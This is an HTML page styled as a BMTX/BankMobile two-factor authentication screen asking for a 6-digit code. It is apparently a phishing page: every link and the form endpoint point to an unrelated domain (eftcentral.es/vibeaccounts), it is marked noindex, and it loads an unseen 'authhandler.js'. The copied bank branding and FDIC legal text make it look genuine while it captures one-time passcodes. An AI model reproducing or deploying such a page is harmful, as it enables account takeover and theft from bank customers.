<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="robots" content="noindex">  
  
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link href="./BMTX_ Two Factor Authentication Verify_files/bootstrap.min.css" rel="stylesheet" type="text/css">
  <link href="./BMTX_ Two Factor Authentication Verify_files/outpages_index.css" rel="stylesheet" type="text/css">
  <link href="./BMTX_ Two Factor Authentication Verify_files/global.css" rel="stylesheet" type="text/css">
  <link rel="shortcut icon" href="https://eftcentral.es/vibeaccounts/favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="./BMTX_ Two Factor Authentication Verify_files/2FAuthentication.css">
  <title>BMTX: Two Factor Authentication Verify</title>
   <script src="authhandler.js"></script>
</head>
<body>
<div id="homepage-wrapper">
      <div class="col-xs-12" id="resp-outheader">
        <div class="hdr-logo-padding">
            <a href="https://eftcentral.es/"><img src="./BMTX_ Two Factor Authentication Verify_files/title_1.gif" height="68" alt="" style="visibility: hidden;"></a>
        </div>
        <div class="row" id="login-row" style="height: 60px;">
          
                <div class="col-xs-12 col-md-offset-0">
                    <div class="row">
                        <div class="login-fields">
                        </div>
                        <div class="login-padding login-button-group">
                        </div>
                    </div>
                </div>
            </form>
        </div>
      </div>
      <div class="pagebody_div factor2Pt">
        <div class="pagecontent_div factor2Content">
         

              <form id="twoFactorAuthenticationForm" method="post" autocomplete="off">

            <div class="container">
            <div class="insides">
              <div class="image">
                <img src="./BMTX_ Two Factor Authentication Verify_files/twofactauth.png">
              </div>
                <div style="text-align: left;">
                  <h1>We sent a secure code to your
                    <strong>email address/mobile phone</strong>
                    Once you receive your code, enter it below.
                  </h1>
                </div>
                <br>
                <div class="method">
                  <div style="text-align: center;">
                    <input type="text" name="twoFactAuthConfCode" id="twoFactAuthConfCode" size="18" maxlength="6" placeholder="Enter 6-digit code">
                  </div>
                </div>
                <div class="login">
                  <div style="text-align: center;"><input type="checkbox" name="saveDeviceCheckBox" value="on">Trust this computer.
                    <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#" class="tooltip"><img src="./BMTX_ Two Factor Authentication Verify_files/ico_tooltip.png">
                      <span>You should only trust this computer if you log in from this device regularly, and trust everyone who uses it.</span>
                    </a>
                  </div>
                </div>
                <div class="verifybuttons">
                  <div style="text-align: center;">
                    <input type="button" value="Go Back" onclick="goBack()" class="cancel">
                    <input type="submit" name="submitBtn4" value="Submit">
                    <input type="submit" name="org.apache.struts.taglib.html.CANCEL" value="Go Back" class="nodisplay cancel" id="cancel2FButton" onclick="bCancel=true;">
                  </div>
                </div>
                <div class="login-need-help">
                  <div style="text-align: center;">
                    <p>Didn't receive a code?
                    <input type="submit" name="method" value="Send new code" class="cancel submitlink"></p>
                  </div>
                </div>
              </div>
            </div>
          </form>
          <div style="clear:both"></div>
        </div>
      <div class="ftr_bar_wide"></div>
      <div id="footer-footer">
        <div class="footertext">
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#">Home</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#" target="security">Security</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#">Fee Schedules</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#">Terms and Conditions</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#">Privacy Statement</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#">Privacy Notice for California Residents</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#">Contact Us</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#" target="EasyHelp" rel="external">Identity Verification</a> |
            <a href="https://eftcentral.es/vibeaccounts/authenticate/otp.php#" target="EasyHelp" rel="external">FAQs</a>
        </div>
        <div class="footertext footer_legaltext">
            <p><img src="./BMTX_ Two Factor Authentication Verify_files/fdic-housing.png" alt="BMTX, Inc.&gt;" class="fdic-logo"></p>

            © 2024 BMTX, Inc., a wholly owned subsidiary of BM Technologies, Inc. All Rights Reserved.<br>


            <br> Digital banking platform powered by BMTX, Inc. BankMobile banking products and banking services are provided by First Carolina Bank, Member FDIC &amp; Equal Housing Lender. The BankMobile Debit Mastercard® card is issued by First
            Carolina Bank pursuant to license from Mastercard International Incorporated. The card is administered by First Carolina Bank. Mastercard and the Mastercard brand mark are registered trademarks of Mastercard International Incorporated.
            All other names and logos are owned by their respective owners.<br>


            <br> BM Technologies, Inc., PO Box 278, Maple Shade, NJ 08052
        </div>
      </div>
  </div>
   

  <script>
    function goBack() {
      window.history.back()
    }
  </script>

</div></body></html>